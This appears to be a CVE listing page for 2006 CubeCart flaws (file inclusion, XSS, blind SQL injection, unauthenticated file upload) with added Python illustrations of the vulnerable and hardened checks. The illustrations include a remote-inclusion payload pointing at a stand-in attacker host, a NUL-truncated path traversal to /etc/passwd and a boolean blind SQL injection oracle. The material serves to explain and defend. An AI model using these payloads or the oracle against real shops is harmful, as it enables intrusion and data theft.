CVE-2006-4527
https://notcve.org/view.php?id=CVE-2006-4527
includes/content/gateway.inc.php in CubeCart 3.0.12 and earlier, when magic_quotes_gpc is disabled, uses an insufficiently restrictive regular expression to validate the gateway parameter, which allows remote attackers to conduct PHP remote file inclusion attacks.
References:
http://cubecart.com/site/forums/index.php?showtopic=21540
http://secunia.com/advisories/21659
http://www.cubecart.com/site/forums/index.php?s=5e34938dc670782af211587b8a450c90&act=Attach&type=post&id=697
http://www.gulftech.org/?node=research&article_id=00111-08282006&
http://www.securityfocus.com/bid/19782
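How an insufficiently restrictive pattern lets an inclusion payload through, as an added Python illustration of the check (this is not CubeCart code; the gateway directory layout, the allowlist of installed gateways and both regular expressions are assumptions, not the pattern the advisory refers to):

```python
import re
from typing import Callable, Optional

# Assumed set of gateway module directories (illustration only; not CubeCart's list).
INSTALLED_GATEWAYS = frozenset({"Authorize", "Protx", "PayPal"})

# Unanchored pattern: succeeds as soon as ANY substring consists of word characters,
# which every RFI or traversal payload contains. Models the vulnerable class of check.
LOOSE_RE = re.compile(r"[A-Za-z0-9_]+")

# Anchored (whole-string) pattern: the value must be a short identifier and nothing else.
STRICT_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def loose_is_valid(gateway: str) -> bool:
    """Vulnerable: search for an unanchored pattern (like preg_match() without ^...$)."""
    return LOOSE_RE.search(gateway) is not None


def strict_is_valid(gateway: str) -> bool:
    """Hardened: whole-string match plus an allowlist of installed gateway names."""
    return STRICT_RE.fullmatch(gateway) is not None and gateway in INSTALLED_GATEWAYS


def gateway_include_target(gateway: str, validator: Callable[[str], bool]) -> Optional[str]:
    """Return the string a PHP include() would receive, or None if validation rejects it.
    The '<gateway>/gateway.inc.php' layout is assumed for this illustration."""
    if not validator(gateway):
        return None
    return gateway + "/gateway.inc.php"


def is_remote_target(target: str) -> bool:
    """True when the include target starts with a URL wrapper that PHP fetches remotely
    (when allow_url_fopen / allow_url_include permit it)."""
    return target.lower().startswith(("http://", "https://", "ftp://"))


# Constructed payloads for the demonstration.
RFI_PAYLOAD = "http://attacker.example/shell.txt?"  # trailing '?' turns the appended suffix into a query string
LFI_PAYLOAD = "../../../../etc/passwd\x00"          # NUL byte truncated the suffix in PHP of that era
```

Both payloads pass the unanchored check because each contains a run of word characters; the anchored check rejects them, and the allowlist rejects even well-formed identifiers that are not installed modules. One common reason an inclusion advisory is conditioned on magic_quotes_gpc being off is NUL-byte truncation, since addslashes() escapes the NUL byte; whether that is the mechanism here is not stated on this page.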
CVE-2006-4268
https://notcve.org/view.php?id=CVE-2006-4268
Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) file, (2) x, and (3) y parameters in (a) admin/filemanager/preview.php; and the (4) email parameter in (b) admin/login.php.
References:
http://bugs.cubecart.com/?do=details&id=523
http://retrogod.altervista.org/cubecart_3011_adv.html
http://secunia.com/advisories/21538
http://securityreason.com/securityalert/1429
http://securitytracker.com/id?1016708
http://www.cubecart.com/site/forums/index.php?showtopic=21247
http://www.osvdb.org/27987
http://www.osvdb.org/displayvuln.php?osvdb_id=27986
http://www.securityfocus.com/archive/1/443476/100/0/threaded
http://www.securityfocus.com/bid/19563
http://www.vupen
CVE-2006-4267 – CubeCart 3.0.11 - 'oid' Blind SQL Injection
https://notcve.org/view.php?id=CVE-2006-4267
Multiple SQL injection vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) oid parameter in modules/gateway/Protx/confirmed.php and the (2) x_invoice_num parameter in modules/gateway/Authorize/confirmed.php.
References:
https://www.exploit-db.com/exploits/2198
http://bugs.cubecart.com/?do=details&id=523
http://retrogod.altervista.org/cubecart_3011_adv.html
http://retrogod.altervista.org/cubecart_3011_sql.html
http://retrogod.altervista.org/cubecart_3011_sql_mqg_bypass.html
http://secunia.com/advisories/21538
http://securityreason.com/securityalert/1429
http://securitytracker.com/id?1016708
http://www.cubecart.com/site/forums/index.php?showtopic=21247
http://www.osvdb.org/27984
http://www.os
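Why a blind injection in an order-id parameter works, and why quote escaping (what magic_quotes_gpc provides) is not a fix, as an added Python/SQLite illustration. This is not CubeCart's code or schema: the orders table, the queries and the payloads are constructed for the example, and SQLite's doubled-quote escaping stands in for the backslash escaping MySQL would see.

```python
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[int]


def build_db() -> sqlite3.Connection:
    """Constructed sample order table (not CubeCart's schema). total is in cents."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (cart_order_id TEXT PRIMARY KEY, total INTEGER, status INTEGER)")
    conn.executemany(
        "INSERT INTO orders VALUES (?, ?, ?)",
        [("060812-1", 1999, 1), ("060812-2", 12000, 2), ("060813-7", 550, 1)],
    )
    return conn


def escape_quotes(value: str) -> str:
    """Stands in for what magic_quotes_gpc / addslashes() buys you against MySQL:
    quote characters are escaped (SQLite doubles them rather than backslash-escaping)."""
    return value.replace("'", "''")


def lookup_quoted_vulnerable(conn: sqlite3.Connection, oid: str) -> List[Row]:
    # String context, raw interpolation: the payload closes the literal and appends SQL.
    return conn.execute(
        f"SELECT total FROM orders WHERE cart_order_id = '{oid}'").fetchall()


def lookup_quoted_escaped(conn: sqlite3.Connection, oid: str) -> List[Row]:
    # String context with quote escaping: the payload stays inside the literal.
    return conn.execute(
        f"SELECT total FROM orders WHERE cart_order_id = '{escape_quotes(oid)}'").fetchall()


def lookup_numeric_escaped(conn: sqlite3.Connection, status: str) -> List[Row]:
    # Numeric context: there are no quotes to break out of, so escaping them changes nothing.
    return conn.execute(
        f"SELECT total FROM orders WHERE status = {escape_quotes(status)}").fetchall()


def lookup_parameterized(conn: sqlite3.Connection, oid: str) -> List[Row]:
    # Bound parameter: the value is data to the engine and is never parsed as SQL.
    return conn.execute(
        "SELECT total FROM orders WHERE cart_order_id = ?", (oid,)).fetchall()


def blind_oracle(conn: sqlite3.Connection, lookup: Callable[[sqlite3.Connection, str], List[Row]],
                 known_oid: str, condition: str) -> bool:
    """Boolean-based blind inference: with a known order id, the presence or absence of a
    result row leaks whether `condition` is true, one bit per request."""
    payload = f"{known_oid}' AND ({condition}) -- "
    return len(lookup(conn, payload)) > 0
```

The oracle never sees query output directly; it only observes whether the confirmation page behaves as if the order exists, which is enough to extract data one comparison at a time. The numeric case is the practical caveat: escaping quotes on input only protects string literals, so a parameter interpolated unquoted (an integer id, a status code) remains injectable however magic_quotes_gpc is set. Bound parameters, or a strict cast to the expected type before use, close both cases.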
CVE-2006-0922 – CubeCart 3.0.x - Arbitrary File Upload
https://notcve.org/view.php?id=CVE-2006-0922
CubeCart 3.0 through 3.6 does not properly check authorization for an administration session because of a missing auth.inc.php include, which results in an absolute path traversal vulnerability in FileUpload in connector.php (aka upload.php) that allows remote attackers to upload arbitrary files via a modified CurrentFolder parameter in a direct request to admin/filemanager/upload.php.
References:
https://www.exploit-db.com/exploits/27304
http://securityreason.com/securityalert/482
http://www.cubecart.com/site/forums/index.php?showtopic=14704
http://www.cubecart.com/site/forums/index.php?showtopic=14817
http://www.cubecart.com/site/forums/index.php?showtopic=14825
http://www.cubecart.com/site/forums/index.php?showtopic=14960
http://www.cubecart.com/site/forums/index.php?
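The two checks the advisory says were missing, an administration-session check before the upload handler runs and confinement of the user-supplied CurrentFolder to the upload root, as an added Python illustration. This is not CubeCart's code: the upload root, the session key, the extension allowlist and the function names are assumptions made for the example.

```python
import os
import re
from typing import Mapping, Optional

# Assumed upload root and permitted extensions (illustration; not CubeCart's configuration).
UPLOAD_ROOT = "/srv/shop/images/uploads"
ALLOWED_EXT = frozenset({".jpg", ".jpeg", ".gif", ".png"})
_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def resolve_folder(base_dir: str, current_folder: str) -> Optional[str]:
    """Map a user-supplied CurrentFolder onto a directory under base_dir.
    Returns None if the value is absolute or escapes base_dir via '..'."""
    folder = current_folder.replace("\\", "/")
    # os.path.join() discards the base when the second argument is absolute; that is the
    # 'absolute path traversal' the advisory describes, so absolute values are rejected outright.
    if folder.startswith("/") or _DRIVE_RE.match(folder):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, folder))
    # realpath() has collapsed any '..' segments, so containment can be checked on the result.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_filename(name: str) -> Optional[str]:
    """Keep only the final path component and require an allowlisted image extension."""
    name = os.path.basename(name.replace("\\", "/"))
    ext = os.path.splitext(name)[1].lower()
    if not name or ext not in ALLOWED_EXT:
        return None
    return name


def plan_upload(session: Mapping[str, object], current_folder: str, filename: str,
                base_dir: str = UPLOAD_ROOT) -> Optional[str]:
    """Decide where an upload would be written. The session check comes first: the advisory's
    root cause is that this step never ran because auth.inc.php was not included."""
    if not session.get("admin_authenticated"):
        raise PermissionError("administration session required")
    folder = resolve_folder(base_dir, current_folder)
    name = safe_filename(filename)
    if folder is None or name is None:
        return None
    return os.path.join(folder, name)
```

The containment check is deliberately done on the canonicalised result rather than by pattern-matching the input for "..", since encodings and mixed separators defeat string filters. The extension allowlist is defence in depth only: a server configured to hand every path component with .php to the interpreter would still execute a file named shell.php.jpg, so uploads belong outside any directory from which scripts are served.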
CVE-2006-0245
https://notcve.org/view.php?id=CVE-2006-0245
Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.7-pl1 allow remote attackers to inject arbitrary web script or HTML via the (3) redir, (4) productId, (5) docId, (6) act, and (7) catId parameters in index.php; and the (8) username field in a login action in index.php. NOTE: the cart.php/redir and index.php/searchStr vectors are already covered by CVE-2005-3152.
References:
http://bugs.cubecart.com/?do=details&id=459
http://lostmon.blogspot.com/2006/01/cubecart-307-pl1-indexphp-multiple.html
http://secunia.com/advisories/18519
http://www.osvdb.org/22471
http://www.securityfocus.com/bid/16259
http://www.vupen.com/english/advisories/2006/0227
https://exchange.xforce.ibmcloud.com/vulnerabilities/24177